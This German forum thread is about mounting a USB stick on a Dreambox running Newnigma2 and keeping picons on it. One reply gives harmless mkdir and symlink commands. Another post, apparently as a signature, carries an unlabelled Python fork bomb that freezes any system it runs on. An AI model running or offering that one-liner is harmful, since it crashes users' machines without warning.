Usb Stick richtig mouten, simlink? Picon Pfad angeben?

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

• Usb Stick richtig mouten, simlink? Picon Pfad angeben?

Also irgendwie bekomme ich das bei Newenigma nicht gebacken den USB Stick richtig zu mouten. sdb1 sdb2 sdc1 usw... wie mach ich das am besten?

Ich möchte das der Stick richtig gemoutet wird und dann die Picon auf den Stick schieben!

Wer kann mir da bitte helfen? Bei Gemini machte ich mir da einen Simlink und die Picon wurden dann auch sofort angezeigt.

Danke für Eure Hilfe..... :D
      LG TIGGER

Immer guter Laune ;) mit der Dreambox 8000ss HD + 800er + 600er und ICVS Image und GP3 im Flash
    • USB-Stick reinstecken, im Newnigma2 Menue auf Geraetemanager gehen, dort verlinken. In den Einstellungen die Picons auf den USB stellen, auf Software Installation Picons gehen, den USB Stick auswaehlen und gewuenschte Picons runterladen. Fertig.
      So hat es gestern noch bei meiner dm500HD funktioniert, die ich neu aufgesetzt hatte.
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • Hi LoUiS,

jaja, Theorie und Praxis.
      Ich hab einen "neuen" Stick im Einsatz und bekomme es auch nicht hin, die Picons auf diesem Stick zu speichern.
      Die LCD Picons liegen jetzt immerhin im Flash (/Picons/), die Skin-Picons jedoch wollen auch dort nicht hin. Das wird nachdem man die Picons ausgewählt hat, gar nicht als Ziel angeboten :(
      Kann man da irgendwo nachgucken, warum das nicht geht?

Tschö,
      Igor
      DM920, HD+NAS, DVB-S2 FBC
    • habe ich schon mal beschrieben, finde es aber auf die Schnelle nicht mehr:

am Stick die Ordner picon, piconHD und piconlcd manuell anlegen, im Rootverzeichnis 3 symlinks mit gleichen Namen wie die am Stick erstellen - die dann auf den Ordner am USB-Stick verweisen, in den OSD-Einstelleungen "Piconinstallation in den Flash erlauben" und als Piconverzeichnis / (Root) einstellen.
      Dann installierst du die Picons in den Flash, laden aber am Stick ...

Wenn die Ordner am Stick schon vorhanden sind, nur den Symlink anlegen

Quellcode

1. ~# mkdir /autofs/sd??/picon
      2. ~# mkdir /autofs/sd??/piconHD
      3. ~# mkdir /autofs/sd??/piconlcd
      4. ~# ln -s /autofs/sd??/picon /picon
      5. ~# ln -s /autofs/sd??/piconHD /piconHD
      6. ~# ln -s /autofs/sd??/piconlcd /piconlcd
      Gruß Fred

Die Dreambox ist tot, es lebe die Dreambox

Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von Fred Bogus Trumper ()

• Darf ich fragen was ihr da macht das picon installen macht doch keine solche probleme es sei denn man verwendet irgend einen multiboot ?(
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von kati910
      Darf ich fragen was ihr da macht das picon installen macht doch keine solche probleme es sei denn man verwendet irgend einen multiboot ?(

Da könntest Du recht haben.
      Die meisten werden sicherlich BA im Flash und verschiedene auf dem Stick ausgelagert haben.
    • so, jetzt habe ich es geschafft. die picons sind auf dem stick.

und nein... ich habe newenigma im flash ... und ba oder multi.... sowas will ich nicht ! lieber ein gescheites image im flash !
      LG TIGGER

Immer guter Laune ;) mit der Dreambox 8000ss HD + 800er + 600er und ICVS Image und GP3 im Flash
    • Original von six6
      Da könntest Du recht haben.
      Die meisten werden sicherlich BA im Flash und verschiedene auf dem Stick ausgelagert haben.

Dann haben diejenigen aber ein Problem was sie selber loesen muessen, da wir ja bekanntermassen aus diesen Gruenden KEINEN Support fuer Multiboot Systeme anbieten!
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)